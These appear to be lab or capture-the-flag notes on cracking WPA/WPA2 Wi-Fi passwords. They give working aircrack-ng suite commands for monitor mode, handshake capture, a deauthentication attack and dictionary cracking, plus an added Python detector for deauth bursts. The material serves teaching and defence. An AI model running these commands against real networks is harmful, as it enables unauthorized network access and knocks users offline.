The 4 way handshake
- Router sends a challenge: The router (or access point) sends a "challenge" to the client, asking it to prove it knows the network's password without directly sharing it.
- Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that the router can only verify if it also has the correct PSK.
- Router verifies and sends confirmation: If the router sees that the client's response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
- Final check and connection established: The client verifies the router's response, and if everything matches, they finish setting up the secure connection.
Preparation
- iw dev — lists all wireless devices and their configuration.
- sudo iw dev wlan2 scan — scans for nearby Wi-Fi networks.
- sudo ip link set dev wlan2 down — turns the device off.
- sudo iw dev wlan2 set type monitor — changes wlan2 to monitor mode.
- sudo ip link set dev wlan2 up — turns the device back on.
Capturing handshake
- sudo airodump-ng wlan2 — start scanning for networks and capturing WPA handshakes.
- Cancel the scan once you have located the target network's channel and BSSID.
- sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2 — use the data you received from your scan: the channel (-c) and the BSSID (--bssid). The output file is later used to crack the password.
Launching a Deauth attack
- sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
- -0 indicates the deauth attack
- 1 is the number of deauths to send
- -a indicates the BSSID of the access point
- -c indicates the MAC address of the client to deauthenticate
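Detection-side counterpart to the deauth step above, as an added example that is not part of the original notes: a burst of deauthentication frames from one address to one client inside a short window is what a wireless IDS looks for. The frame records are constructed sample data and the field layout, window and threshold are assumptions.

```python
from collections import defaultdict

# Constructed sample of 802.11 management-frame metadata as a monitor-mode
# capture or wireless IDS might record it: (time_s, subtype, src_mac, dst_mac).
# Addresses reuse the placeholder AP/client values from the notes above.
AP = "02:00:00:00:00:00"
CLIENT = "02:00:00:00:01:00"
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
    (1.00, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
    # Six deauth frames to one client within a quarter of a second: a burst.
    (5.00, "deauth", AP, CLIENT),
    (5.05, "deauth", AP, CLIENT),
    (5.10, "deauth", AP, CLIENT),
    (5.15, "deauth", AP, CLIENT),
    (5.20, "deauth", AP, CLIENT),
    (5.25, "deauth", AP, CLIENT),
    (6.00, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
    # A single deauth from a station leaving the network: normal behaviour.
    (20.00, "deauth", "02:00:00:00:02:00", AP),
]


def detect_deauth_bursts(frames, window_s=1.0, threshold=5):
    """Return (src, dst, count, window_start) for every src->dst pair whose
    densest window_s-second window holds at least `threshold` deauth or
    disassoc frames. One alert per pair; a lone deauth never triggers."""
    by_pair = defaultdict(list)
    for t, subtype, src, dst in frames:
        if subtype in ("deauth", "disassoc"):
            by_pair[(src, dst)].append(t)

    alerts = []
    for (src, dst), times in by_pair.items():
        times.sort()
        best_count, best_start = 0, None
        start = 0
        # Sliding window: advance `start` until the window fits in window_s.
        for end, t_end in enumerate(times):
            while t_end - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count > best_count:
                best_count, best_start = count, times[start]
        if best_count >= threshold:
            alerts.append((src, dst, best_count, best_start))
    return alerts


if __name__ == "__main__":
    for src, dst, n, t0 in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {n} frames {src} -> {dst} starting at t={t0}s")
```

Because WPA2 without Protected Management Frames (802.11w) accepts unauthenticated deauth frames, the only defences are this kind of burst detection and enabling 802.11w on the access point and clients.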
Cracking WPA/WPA2 password
- sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*.cap
- -a 2 — indicates the attack mode (2 = WPA/WPA2-PSK)
- -b indicates the BSSID of the access point
- -w indicates the wordlist (dictionary) to use for the attack